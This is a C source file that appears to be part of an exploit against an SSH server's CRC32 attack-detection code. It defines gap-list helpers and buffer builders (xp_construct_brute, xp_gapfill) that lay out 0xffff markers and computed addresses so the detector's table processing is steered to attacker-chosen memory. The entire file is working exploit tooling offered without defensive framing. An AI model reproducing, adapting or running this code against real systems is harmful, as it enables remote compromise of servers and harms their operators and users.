#include <unistd.h>
#include <stdlib.h>
#include <getput.h>
#include <stdio.h>



typedef struct gap_elem {
	struct gap_elem *	next;

	unsigned long int	rel_ofs;
	unsigned long int	size;
} gap_elem;

gap_elem *
gap_add (gap_elem *gap, unsigned long int rel_ofs, unsigned long int size);

int
gap_test (gap_elem *gap, unsigned long int rel_ofs, unsigned long int size);

gap_elem *
gap_free (gap_elem *gap);

void
xp_construct_brute_exact (unsigned char *buf, unsigned long int buf_size,
	unsigned long int diff);

void
xp_construct_brute (unsigned char *buf, unsigned long int buf_size,
	unsigned long int diff);

void
xp_gapfill (gap_elem *gap,
	unsigned long int diff,
	unsigned char *buf, unsigned long int buf_size);

#define	BLK_PUT_ADDR(c,diff) { \
	unsigned long int	wr = (diff) / 2; \
	(c)[0] = (wr >> 24) & 0xff; \
	(c)[1] = (wr >> 16) & 0xff; \
	(c)[2] = (wr >> 8) & 0xff; \
	(c)[3] = wr & 0xff; \
}

#define	BLK_PUT(c,diff,bonus) { \
	unsigned long int	wr = (diff) / 2; \
	c[0] = (wr >> 24) & 0xff; \
	c[1] = (wr >> 16) & 0xff; \
	c[2] = (wr >> 8) & 0xff; \
	c[3] = wr & 0xff; \
	c[4] = (bonus >> 24) & 0xff; \
	c[5] = (bonus >> 16) & 0xff; \
	c[6] = (bonus >> 8) & 0xff; \
	c[7] = bonus & 0xff; \
	c += 8; \
}


gap_elem *
gap_add (gap_elem *gap, unsigned long int rel_ofs, unsigned long int size)
{
	gap_elem *	gap_new = calloc (1, sizeof (gap_elem));

	gap_new->rel_ofs = rel_ofs;
	gap_new->size = size;
	gap_new->next = gap;

	return (gap_new);
}


/* gap_test
 *
 * return 1 in case if space at `rel_ofs' with size `size' is gapped
 * return 0 if it is ok
 */
int
gap_test (gap_elem *gap, unsigned long int rel_ofs, unsigned long int size)
{
	for (; gap != NULL ; gap = gap->next) {
		if (gap->rel_ofs >= rel_ofs + size)
			continue;
		if (gap->rel_ofs + gap->size <= rel_ofs)
			continue;

		return (1);
	};

	return (0);
}


/* gap_free
 *
 * free a whole gap chain, starting from `gap'.
 */
gap_elem *
gap_free (gap_elem *gap)
{
	gap_elem *	to_free;

	while (gap != NULL) {
		to_free = gap;
		gap = gap->next;

		free (to_free);
	}

	return (NULL);
}

gap_elem *		gap_root = NULL;


void
xp_construct_brute_exact (unsigned char *buf, unsigned long int buf_size,
	unsigned long int diff)
{
	unsigned long int	addr_walker;
	unsigned long int	idx;
	unsigned char *		cp;

	/* we want to assign every block it's own 0xffff block, so we can
	 * guarantee that the offset is 100% correct
	 */
	for (idx = 0 ; idx < buf_size ; idx += 8) {
		addr_walker = diff + idx + 6;
		cp = &buf[idx];
		BLK_PUT (cp, addr_walker, 0x7350ffff);
	}

	return;
}


void
xp_construct_brute (unsigned char *buf, unsigned long int buf_size,
	unsigned long int diff)
{

	gap_root = NULL;
	memset (buf, '\xff', buf_size);

	xp_gapfill (gap_root, diff, buf, buf_size);

	return;
}

void
xp_gapfill (gap_elem *gap,
	unsigned long int diff,
	unsigned char *buf, unsigned long int buf_size)
{
	unsigned char *		cp;
	unsigned long int	buf_rel = 0;
	unsigned long int	buf_ffff_rel = 0;

	for ( ; buf_rel < buf_size ; ) {
		/* find safe place to store 0xffff to and do it
		 */
		do {
			if ((buf_ffff_rel % 8) == 4)
				buf_ffff_rel += 2;
			else if ((buf_ffff_rel % 8) == 6)
				buf_ffff_rel += 6;
			else
				buf_ffff_rel += 4;
		} while (buf_ffff_rel < buf_size &&
			gap_test (gap, buf_ffff_rel, 2) != 0);
		if (buf_ffff_rel >= buf_size) {
			fprintf (stderr,
				"xp_gapfill: buf_ffff_rel out of range of `buf'\n");
			exit (EXIT_FAILURE);
		}

		buf[buf_ffff_rel] = '\xff';
		buf[buf_ffff_rel + 1] = '\xff';

		/* now we do have a location where 'our' 0xffff lies, use the
		 * address of it as safeguard for the detect_attack processing
		 */
		while (buf_rel < buf_size &&
			gap_test (gap, buf_rel, 4) == 1)
		{
			buf_rel += 8;
		}

		if (buf_rel >= buf_size)
			return;	/* did the mission */

		cp = buf + buf_rel;
		BLK_PUT_ADDR (cp, diff + buf_ffff_rel);
		buf_rel += 8;
	}

	return;
}

